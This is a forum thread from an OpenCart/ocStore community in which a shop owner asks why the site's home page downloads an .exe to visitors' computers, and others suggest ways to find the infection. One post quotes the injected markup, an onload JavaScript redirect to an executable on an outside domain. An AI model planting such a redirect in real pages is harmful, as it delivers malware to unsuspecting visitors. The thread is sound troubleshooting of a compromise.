Перейти до вмісту
Пошук в
  • Детальніше...
Шукати результати, які ...
Шукати результати в ...

Вирус закачивается на компьютер при открытии сайта


Recommended Posts

ocstore 2.3.0.2.3 
newstore

При посещении главной страницы сайта, загружается на компьютер exe файл c другого магазина сделаного также на opencart
обращение в поддержку хостинга особо не помогло.
Где копать?

Надіслати
Поділитися на інших сайтах


  В 09.10.2022 в 06:27, borborich сказав:

Где копать?

Expand  

Заходите в панель управления хостинга и ищите измененные файлы, время создания/модификации которых отличается от остальных. 

Известно ли, как называется вредоносный exe?

Змінено користувачем esculapra
Надіслати
Поділитися на інших сайтах

  В 09.10.2022 в 06:27, borborich сказав:

ocstore 2.3.0.2.3 
newstore

При посещении главной страницы сайта, загружается на компьютер exe файл c другого магазина сделаного также на opencart
обращение в поддержку хостинга особо не помогло.
Где копать?

Expand  

 

https://opencartforum.com/files/file/8788-chistka-saytov-i-serverov-ot-virusov/

  • +1 1
Надіслати
Поділитися на інших сайтах

  В 09.10.2022 в 06:47, esculapra сказав:

Заходите в панель управления хостинга и ищите измененные файлы, время создания/модификации которых отличается от остальных. 

Известно ли, как называется вредоносный exe?

Expand  

 

Делал откат на месяц назад, тогда этой проблемы не было, но не помогло.
Файл называется прайслист.exe качается с другого сервера.

Надіслати
Поділитися на інших сайтах


  В 10.10.2022 в 06:37, borborich сказав:

Делал откат на месяц назад

Expand  

Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

Надіслати
Поділитися на інших сайтах

  В 10.10.2022 в 07:21, esculapra сказав:

Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

Expand  

Спасибо, сейчас буду делать

 

Надіслати
Поділитися на інших сайтах


  В 10.10.2022 в 07:21, esculapra сказав:

Откат помогает только восстановить предыдущие версии файлов. Но никак не влияет на добавленные. Троян может сидеть в картинках, например. Попробуй установить бесплатный скрипт ai-bolit и поискать с его помощью.  Если вирус закачивается только с главной страницы, то нужно определить от какого модуля это идет, то есть отключать модули и смотреть, чтобы потом сузить область поиска.

Expand  

 

ai-bolt что то пропустил все файлы

Schermata 2022-10-10 alle 11.59.07.png

Надіслати
Поділитися на інших сайтах


  В 10.10.2022 в 10:00, borborich сказав:

 

ai-bolt что то пропустил все файлы

Schermata 2022-10-10 alle 11.59.07.png

Expand  

Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом

Змінено користувачем SSHEVA
  • +1 1
Надіслати
Поділитися на інших сайтах

  В 10.10.2022 в 10:12, SSHEVA сказав:

Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК, скачал сайт на пк и проверил и он нашел 8 картинок, которые были вирусом

Expand  

 

каким антивирусом пользовались?

Надіслати
Поділитися на інших сайтах


  В 10.10.2022 в 11:16, borborich сказав:

 

каким антивирусом пользовались?

Expand  

ESET SMART SECURITY PREMIUM

Надіслати
Поділитися на інших сайтах

  В 10.10.2022 в 10:12, SSHEVA сказав:

Как бы смешно не звучало, но мне в подобной беде помог, антивирус ПК

Expand  

Я еще не успел этого написать. Да, если на сайте плотно поковырялись, то антивирус реально найдет. Айболит должен был найти, но видимо там нет явного кода. Можно попробовать параноидальный режим. Хотя, если это в картинках то может не найти - проще посмотреть исходный код страницы и какие картинки подключаются, а потом сравнить их по времени создания. Картинки также могут подключаться через стили, но тут откат бы все исправил.

Змінено користувачем esculapra
Надіслати
Поділитися на інших сайтах

  В 10.10.2022 в 13:44, borborich сказав:

ссыль на файл прям в боди вставляется, скачиваю файлы сайта на компьютер чтоб сканировать.

Schermata 2022-10-10 alle 15.03.48.png

Expand  

После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще  Поиск использовать в редакторе.

Надіслати
Поділитися на інших сайтах

  В 10.10.2022 в 13:54, SSHEVA сказав:

После проверки антивирусов, если что еще проверьте скрипты и все файлы дизайна в ручную, для ускорения можно еще  Поиск использовать в редакторе.

Expand  

спасибо, собственно для этого и скачиваю

Надіслати
Поділитися на інших сайтах


Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';">
дают ноль результатов

Надіслати
Поділитися на інших сайтах


  В 11.10.2022 в 09:18, borborich сказав:

Антивирус ни чего не находит в файлах, попытки найти в файлах какую либо часть этого хвоста onload="javascript:window.location.href = 'https://f-sladosti.ru/image/НашПрайс2022Dec.exe';">
дают ноль результатов

Expand  

Тогда нужно смотреть уже сайт, так вслепую сложно сказать

Надіслати
Поділитися на інших сайтах

  В 11.10.2022 в 18:38, 29aleksey сказав:

В настройки шаблона в поле код счетчика прописывается только с админки 

Expand  

 

подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда

Надіслати
Поділитися на інших сайтах


  В 12.10.2022 в 12:48, borborich сказав:

 

подозреваю тогда что администратор цен магазина имел троян на компьютере, через который и прописалось туда

Expand  

Звучит это все как фантастика :huh:

Надіслати
Поділитися на інших сайтах

Створіть аккаунт або увійдіть для коментування

Ви повинні бути користувачем, щоб залишити коментар

Створити обліковий запис

Зареєструйтеся для отримання облікового запису. Це просто!

Зареєструвати аккаунт

Вхід

Уже зареєстровані? Увійдіть тут.

Вхід зараз
×
×
  • Створити...

Important Information

На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність.